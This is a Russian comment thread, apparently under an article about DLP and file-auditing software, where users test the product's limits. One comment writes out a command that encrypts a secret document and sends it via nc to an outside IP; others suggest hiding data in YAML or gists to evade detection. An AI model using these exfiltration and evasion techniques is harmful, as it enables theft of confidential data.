Comments 13
Есть ли лог изменений файлов?
У нас используется какой то древний change auditor. Он часто пропускает если кто-то то меняет файл по \UNC\path
выглядит очень интересно. А что произойдёт при попытке отправить документ с коммерческой тайной на посторонний сайт?
например, так:
(cat < secret.docx) | gpg -c | base64 |nc 172.217.19.46 53
Если говорить в целом про возможности FileAuditor блокировать пересылку зашифрованного документа, то будет зависеть от настроенных правил. Если у пользователя заблокирован доступ, он не сможет никаких манипуляций выполнить с файлом, в том числе и шифровать его. Но, повторюсь, нужно поработать с настройками.
Вторая часть вопроса — попытка отправить комтайну на посторонний сайт — и DLP, и FileAuditor могут запретить действие просто из за самого факта «запароленности», то есть отработает не правило про комтайну, а правило «шифрованное содержание».
DLP работает и на линуксе, и на винде. Агентское решение «файлового аудитора» для линукса пока в разработке, поэтому на данный момент можно использовать только сетевой модуль (который подключается с сервера по NFS к машине с линуксом).
А как вы определяете шифрованность? Например, если это dmcrypt в plain режиме, там нет никаких сигнатур. Просто блоб с расширением .wav, например.
Окей, я сказал wav не посмотрев на то, что он весь chunked. Хорошо, оно будет application/yaml, внутри которого будет так:
---
bugreport:
type: segfault
dump: |
(base64 here)
...
Ваш парсер видит, что это application/yaml. Смотрит во внутрь. Действительно, yaml.
Что делать? Пропускать? Блокировать?
Скажу так, если у вы хотите придумать пример, который покажет, что софт что-то пропустит, то вы такой пример придумаете. Абсолютной защиты нет. Вопрос в том, насколько среднестатистический пользователь сможет реализовать предложенный способ обхода. За скобками оставляем вопрос, с чего вдруг пользователь начнёт городить подобный огород. В конце концов, если от отойти предотвращения к обнаружению, то сработает комплексный подход. Следы (явные и понятные) останутся в DLP как минимум в Keylogger'e и MonitorController'e. В других каналах тоже что-то будет, но уже не такое очевидное, как по мне.
Вы хотите блочить весь yaml? А как насчёт JSON, XML и HTML?
В принципе, airgapped доступ в интернет очень безопасный. Но не очень функциональный.
Я не совсем понял, в каком месте остается всё. Если человек на github зальёт в gist шифрованный base64, то какие именно у вас останутся следы? Факт обращения к github'у?
Если заархивировать?
Блокировки хорошие и не очень